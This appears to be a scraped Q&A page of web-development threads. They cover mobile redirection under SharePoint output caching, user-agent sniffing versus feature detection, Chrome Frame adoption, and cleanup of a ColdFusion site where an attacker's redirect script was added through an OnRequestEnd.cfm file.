We're building a mobile-friendly site to work in tandem with our client's MOSS 2007 internet site. We need to be able to redirect users who hit the home page and are using a mobile device.
Our original intention was to add a custom control to the home page page layout that would detect the current user's device and redirect to the mobile site accordingly. We quickly realised that this would not work as we are using the Output Caching functionality provided by SharePoint/Asp.Net. This means that the detection code will only run for the first visitor to the home page until the cache expires.
Our next idea was to build a custom HTTP Module and process the detection there. However, we are finding that the Output Caching is not allowing that either. If the cache is set while a mobile device is visiting all browsers are subsequently redirected to the mobile site (until the cache expires).
If we turn off output caching it works just fine - but we cannot turn output caching off, especically for the home page. We did investigate Substitution (Donut) Caching but this is not working due to the fact we are filtering the Asp.Net response within another HTTP Module that tidies up the rendered HTML for XHTML compatiblity reasons. I've also experimented with the output cache profile by setting it to vary-by-header property to "User-Agent" but I am getting mixed results and am also concerned at the memory implications of caching multipel versions of pages (we already have memory issues now and then).
It's possible we could run the redirection code in JavaScript but then we risk not detecting a lot of devices that don't have JavaScript enabled. This is a government website so the usage of JavaScript has to abide by accessibility guidelines.
Does anyone have any other ideas as to how we can solve this issue. Has anyone done this before? Perhaps in a different way?
Hope you can help, thanks.
p.s. I have also asked this question on SharePoint.SE but wanted to get as many eyes on this as possible.
I would suggest you to try ISAPI filters
I've actually solved this one I think. I've pretty much followed this article here - http://msdn.microsoft.com/en-us/library/ms550239.aspx. We have updated the code in that article to build a cache key based on whether the current page is the home page, whether the current user is using a mobile device and whether or not a cookie exists forcing the user to the full site. I will probably write this up as a blog post. When I do I will update this answer providing a link.
Related
Does anybody have the same problem? New extension with verified domain and enabled inline install after clicking on button with chrome.webstore.install();cause redirect to chromestore with get parameter ?utm_source=inline-install-disabled
I recently received the following email from Chrome Web Store Developer Support:
In addition to the existing extension-level protection, our expanded
enforcement will also use machine learning to evaluate each inline
installation request for signals of deceptive, confusing, or malicious
ads or webpages. When we find those signals, we'll selectively disable
that one inline installation request and redirect the user to the
extension's page on the Chrome Web Store. This selective enforcement
will not impact inline installation of that extension from other,
non-deceptive sources. Developers will not be notified of this
enforcement, as it happens on an as-needed basis.
Are you serving any ads on your site or doing anything else that might be perceived as a grey area by ML?
If you're being blatantly deceptive, it would appear that you've been found out. If not, and you're genuinely confused, a possible first step would be to scrape your site of any ads or injected content altogether to see if you're able to regain Google's trust.
I have read several articles on feature detection and that it is more reliable than browser detection because browsers lie.
I couldn't find any information on why they lie. Does anyone know the reason why they would do that?
As far as I understand it, Webmasters do browser sniffing to find the capabilities of a browser and limit what they send to the browser. If a browser lies about it's capabilities they will receive more from the webmaster, you can read more:
http://farukat.es/journal/2011/02/499-lest-we-forget-or-how-i-learned-whats-so-bad-about-browser-sniffing
http://webaim.org/blog/user-agent-string-history/
The reason is simple:
Because web sites look at the user agent string and make assumptions about the browser, which are then invalid when the browser is updated to a new version.
This has been going on almost since the begining of the web. Browser vendors don't want their new versions to break the web, so they tweak the UA string to fool the code on existing sites.
Ultimately, if everyone used the UA string responsibly and updated their sites whenever new browser versions come out, then browsers wouldn't need to lie. But you have to admit, that's asking quite a lot.
Feature detection works better because when a new browser version comes out with that feature, the detection will pick it up automatically without the either browser needing to do anything special nor the site owner.
Of course, there are times when feature detection doesn't work perfectly -- eg maybe if a feature exists but has bugs in a particular browser. In that case, yes, you may want to do browser detection as a fall-back. But in most cases, feature detection is a much better option.
Another more modern reason is to just avoid demands to install mobile apps (where product owners contol what I can and can't do with content. No thanks!).
Today Reddit started to block viewing subreddits in case they detect a mobile browser in UserAgent so I had to change it just to be able to view content.
I'm working on a project for class. To create a website and a website for mobile users. The site is to recongize the type of device/browser accessing the page and send the appropiate form. So if I was to visit the site on IE8 it will direct me to the mainpage for IE8, if I was to access the site with a mobile device it will direct me to the mobile website main page automatically.
Also, I need to design the website for at least two different screen sizes.
I'm coding in HTML5, I do not know the type of server the site will be hosted on. The use of Javascript is extra credited. The project details are to "design a small mobile web site. The web site should be tested on one or more mobile devices. The iPod Touch device will be used as the base for testing."
I know how to do 8/10 of the requirements (except the two mentioned). I looked at W3C and didn't find anything.
Any help would be much appreciated. Thank you!
Do a Google for:
CSS Browser Detection
JavaScript Browser Detection
Also you should think twice about creating multiple sites - with basically the same content - or creating proper stylesheets that are referred from the same site.
Hope that get's you the other 2 requirements
NOTE: Since this is homework I won't post any links...
I suspect that ServerFault isn't the best place for this question...but aside from that, your question is a little vague. A google search for "designing a mobile website" turns up what looks to be several pages of relevant information. If you first try working with the information in those documents and then come back with specific questions (e.g., "I tried this and it behaved this way instead of the way I expected") you're apt to get better answers.
I was thinking to add meta tag always in all the websites.
That will trigger google chorme frame to load for users who already installed. I can see the benefits but is there any concerns or facts that I should know before I do that?
Testing in google chrome is enough or testing in google chrome frame explicitly required?
Thanks
Note: please do not mention current know problems "print" and "download" issue. I'm sure those will get fixed soon :)
The only argument against chrome frame that I have seen so far is Microsoft's - "Google Chrome Frame running as a plugin has doubled the attach area for malware and malicious scripts."
Also, you may run into problems with frames. If you have chrome frame on your page and someone has that page iframed on their site you may run into some problems. More info:
http://groups.google.com/group/google-chrome-frame/browse_thread/thread/d5ffe442658bc60e/e6d7a4c1c179c931?lnk=gst&q=iframe
You should only need to test in Chrome Frame for (X)HTML, CSS, and JavaScript...basic stuff. If you are using AJAX (while trying not to break the back button), worried about caching, cookies (accessed via javascript), or other potentially browser-specific browser interactions I suggest testing on the IE+CF platform...at least until the CF team announces 100% interoperability between CF and IE.
Check out the CF Google group for more issues.
Are there any concerns or facts you should know? Yes: Not everyone has Google Chrome Frame installed.
You are adding a new user agent that you will need to test and debug against, without removing the need to test and debug the user experience for other browsers (notably plain IE by itself).
If you don't make the IE user experience equivalent to the Google Chrome experience, then you are alienating a significant percentage of users. Depending on your website and its expected users, the impact of this may range from undesirable to unacceptable. If you do make the user experience equivalent, then there is no point in adding the meta tag.
A couple sites of mine recently got "hacked". Someone was able to add a line of JavaScript to the bottom of every page on the site.
The server is a Windows Server 2003, and has Cold Fusion 8 and MySQL 5.x installed and running.
Looking into the code on each page shows that none of the pages were modified. The JavaScript is not in the code files themselves. This leads me to believe it is an IIS problem, but I am unsure and cannot find anything that would be able to do this within IIS.
The JavaScript being added redirects a user to another page only when they come from Google, or at least it appears to work this way.
Any help on how someone was able to accomplish this as well as removing it would be greatly appreciated.
Another way to word the question thanks to #Jeffrey Hantin
How do you systematically modify output from IIS without modifying individual pages?
EDIT: A bit more testing has shown that only the .cfm pages add the extra javascript. Added a new .cfm and the js was there but a .html did not have it.
Edit2: Turns out to have been a coldfusion problem after all. Somehow the pages OnRequestEnd.cfm were created on the sites and added that js.
Looks like someone exploited some latest Adobe CF vulnerabilities.
Please see these blog posts for details and try to search symptoms on your server:
Image upload
FCKEditor bug + this post
Hope this helps.
Turns out to have been a coldfusion problem after all. The page OnRequestEnd.cfm were created on the sites and added that js.
If you only want to use IIS to modify output, the ISAPI filter is probably the best answer. If you would like to use Coldfusion, you could utilize the application.cfc to modify output during certain parts of the request cycle or wrap all of your pages in a Custom Tag to consolidate the like portions of your page templates.
I have used both. In cases where my page headers and footers are all the same, the custom tag is fast and easy to use. To make changes to all the pages, you edit one custom tag file. In cases where I have a more complicated web application I'll use the application.cfc to store and insert common components where they are needed.
They might have guessed your password. You should change it immediately.
It's possible that an ISAPI filter is used to do this. I once used one myself to perform compression before IIS supported it natively.
In your specific situation, you may want to check for ISAPI filters you don't want installed. Of course, if your server has been compromised, you will likely be better off rebuilding from a known good image rather than trying to fix it in situ.